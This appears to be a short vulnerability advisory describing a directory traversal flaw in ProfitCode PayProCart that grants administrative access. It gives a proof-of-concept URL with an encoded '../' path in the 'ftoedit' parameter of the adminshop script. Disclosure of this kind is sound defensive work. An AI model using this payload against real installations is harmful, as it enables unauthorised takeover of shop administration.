ProfitCode Software PayProCart Directory Traversal Vulnerability

info
discussion
exploit
solution
references

ProfitCode Software PayProCart Directory Traversal Vulnerability

An exploit is not required.

The following proof of concept can allow an attacker to gain administrative access to the application:

http://www.example.com/adminshop/index.php?proMod=index&amp%3bftoedit=..%2fshopincs%2fmaintopENG